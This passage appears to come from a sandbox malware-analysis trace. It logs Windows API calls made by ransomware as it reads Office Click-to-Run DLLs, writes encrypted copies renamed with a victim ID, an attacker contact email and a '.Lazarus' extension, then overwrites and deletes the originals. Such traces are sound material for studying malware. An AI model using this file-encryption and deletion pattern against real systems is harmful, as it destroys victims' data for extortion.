dwFlags=0x9, lpMultiByteStr=0x5fe78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0089.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x134) returned 0x4e568 [0089.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5fe78, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=154 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 154 [0089.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.705] GetFileType (hFile=0x360) returned 0x1 [0089.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0089.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0089.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0089.705] AreFileApisANSI () returned 1 [0089.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0089.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0089.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 92 [0089.705] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.706] GetFileType (hFile=0x418) returned 0x1 [0089.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0089.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0089.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0089.706] GetLastError () returned 0x0 [0089.706] SetLastError (dwErrCode=0x0) [0089.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0089.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0089.706] GetLastError () returned 0x0 [0089.706] SetLastError (dwErrCode=0x0) [0089.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0089.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0089.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0089.706] ReadFile (in: hFile=0x418, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0089.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0089.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0089.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0089.708] GetLastError () returned 0x0 [0089.708] SetLastError (dwErrCode=0x0) [0089.708] GetLastError () returned 0x0 [0089.708] SetLastError (dwErrCode=0x0) [0089.709] GetLastError () returned 0x0 [0089.709] SetLastError (dwErrCode=0x0) [0089.709] GetLastError () returned 0x0 [0089.709] SetLastError (dwErrCode=0x0) [0089.709] ReadFile (in: hFile=0x418, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.709] WriteFile (in: hFile=0x360, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.710] GetLastError () returned 0x0 [0089.710] SetLastError (dwErrCode=0x0) [0089.710] GetLastError () returned 0x0 [0089.710] SetLastError (dwErrCode=0x0) [0089.710] GetLastError () returned 0x0 [0089.710] SetLastError (dwErrCode=0x0) [0089.710] GetLastError () returned 0x0 [0089.711] SetLastError (dwErrCode=0x0) [0089.711] ReadFile (in: hFile=0x418, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.711] WriteFile (in: hFile=0x360, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.711] GetLastError () returned 0x0 [0089.711] SetLastError (dwErrCode=0x0) [0089.711] GetLastError () returned 0x0 [0089.711] SetLastError (dwErrCode=0x0) [0089.711] GetLastError () returned 0x0 [0089.711] SetLastError (dwErrCode=0x0) [0089.711] GetLastError () returned 0x0 [0089.711] SetLastError (dwErrCode=0x0) [0089.712] ReadFile (in: hFile=0x418, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.712] WriteFile (in: hFile=0x360, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.712] GetLastError () returned 0x0 [0089.712] SetLastError (dwErrCode=0x0) [0089.712] GetLastError () returned 0x0 [0089.712] SetLastError (dwErrCode=0x0) [0089.712] GetLastError () returned 0x0 [0089.712] SetLastError (dwErrCode=0x0) [0089.712] GetLastError () returned 0x0 [0089.712] SetLastError (dwErrCode=0x0) [0089.712] ReadFile (in: hFile=0x418, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.713] WriteFile (in: hFile=0x360, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.713] GetLastError () returned 0x0 [0089.713] SetLastError (dwErrCode=0x0) [0089.713] GetLastError () returned 0x0 [0089.713] SetLastError (dwErrCode=0x0) [0089.713] GetLastError () returned 0x0 [0089.713] SetLastError (dwErrCode=0x0) [0089.713] GetLastError () returned 0x0 [0089.713] SetLastError (dwErrCode=0x0) [0089.713] ReadFile (in: hFile=0x418, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f0c4*=0x8c0, lpOverlapped=0x0) returned 1 [0089.713] WriteFile (in: hFile=0x360, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.714] GetLastError () returned 0x0 [0089.714] SetLastError (dwErrCode=0x0) [0089.714] GetLastError () returned 0x0 [0089.714] SetLastError (dwErrCode=0x0) [0089.714] ReadFile (in: hFile=0x418, lpBuffer=0x8e440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0089.714] GetLastError () returned 0x0 [0089.714] SetLastError (dwErrCode=0x0) [0089.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0089.714] WriteFile (in: hFile=0x360, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327ef70*=0x8c0, lpOverlapped=0x0) returned 1 [0089.714] GetLastError () returned 0x0 [0089.714] SetLastError (dwErrCode=0x0) [0089.714] GetLastError () returned 0x0 [0089.714] SetLastError (dwErrCode=0x0) [0089.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0089.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0089.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0089.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0089.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0089.715] CloseHandle (hObject=0x360) returned 1 [0089.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0089.716] CloseHandle (hObject=0x418) returned 1 [0089.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0089.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0089.717] AreFileApisANSI () returned 1 [0089.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0089.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0089.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 92 [0089.717] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.718] GetFileType (hFile=0x418) returned 0x1 [0089.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0089.718] GetLastError () returned 0xb7 [0089.718] SetLastError (dwErrCode=0xb7) [0089.718] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0089.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0089.719] CloseHandle (hObject=0x418) returned 1 [0089.720] AreFileApisANSI () returned 1 [0089.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0089.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0089.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 92 [0089.720] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll")) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0089.721] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.721] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.721] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="api-ms-win-crt-environment-l1-1-0.dll", cAlternateFileName="APC00F~1.DLL")) returned 1 [0089.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0089.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0089.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0089.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0089.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0089.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0089.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0089.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0089.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0089.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0089.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0089.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0089.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0089.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0089.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0089.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0089.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0089.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0089.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0089.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0089.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0089.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0089.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0089.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.722] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.722] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.722] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.722] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0089.722] AreFileApisANSI () returned 1 [0089.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 96 [0089.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0089.722] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.722] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0089.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0089.723] AreFileApisANSI () returned 1 [0089.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0089.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0089.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=96 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll") returned 96 [0089.723] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.723] GetFileType (hFile=0x418) returned 0x1 [0089.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.723] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0089.723] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0089.724] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0089.724] CloseHandle (hObject=0x418) returned 1 [0089.724] AreFileApisANSI () returned 1 [0089.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0089.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0089.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71828, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=96 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll") returned 96 [0089.724] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.724] GetFileType (hFile=0x418) returned 0x1 [0089.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.724] CloseHandle (hObject=0x418) returned 1 [0089.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 